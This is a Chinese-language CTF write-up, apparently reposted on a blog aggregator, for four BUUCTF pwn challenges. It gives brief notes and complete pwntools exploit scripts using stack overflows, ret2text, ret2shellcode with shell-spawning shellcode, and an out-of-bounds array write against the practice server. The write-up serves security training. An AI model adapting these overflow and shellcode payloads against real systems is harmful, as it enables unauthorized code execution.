PWN-PRACTICE-BUUCTF-30

• • suctf_2018_stack
  • wdb_2018_3rd_soEasy
  • [BSidesCF 2019]Runit
  • qctf2018_stack2

suctf_2018_stack

棧溢出，ret2text，返回地址不能直接是next_door的起始地址
設置返回地址為0x40067A，開始設置系統調用的參數以及系統調用號

from pwn import * #context.log_level='debug' #io=process('./SUCTF_2018_stack') io=remote('node4.buuoj.cn',26579) elf=ELF('./SUCTF_2018_stack') shell=0x000000000040067A io.recvuntil('============================\n') payload='a'*(0x20+8)+p64(shell) io.sendline(payload) io.interactive()

wdb_2018_3rd_soEasy

給了輸入在棧上的地址，且NX disabled，棧溢出ret2shellcode

from pwn import * context.arch='i386' #io=process('./wdb_2018_3rd_soEasy') io=remote('node4.buuoj.cn',25581) elf=ELF('./wdb_2018_3rd_soEasy') io.recvuntil('a gift->0x') addr=int(io.recvuntil('\n')[:-1],16) io.recvuntil('to do?\n') shellcode=asm(shellcraft.sh()) payload=shellcode.ljust(0x48+4,'a')+p32(addr) io.sendline(payload) io.interactive()

[BSidesCF 2019]Runit

棧溢出，ret2shellcode

from pwn import * context.arch='i386' #io=process('./BSidesCF_2019_Runit') io=remote('node4.buuoj.cn',25615) elf=ELF('./BSidesCF_2019_Runit') shellcode=asm(shellcraft.sh()) io.recvuntil('stuff!!\n') io.sendline(shellcode) io.interactive()

qctf2018_stack2

數組越界寫，ret2text

from pwn import * #io=process('./qctf2018_stack2') io=remote('node4.buuoj.cn',28396) elf=ELF('./qctf2018_stack2') io.sendlineafter('you have:\n','0')offset=0x84backdoor = [0x9b, 0x85, 0x04, 0x08]for i in range(4):io.sendlineafter('exit\n','3')io.sendlineafter('change:\n',str(offset+i))io.sendlineafter('number:\n',str(backdoor[i]))io.sendlineafter('exit\n','5') io.interactive()

總結

以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-30的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。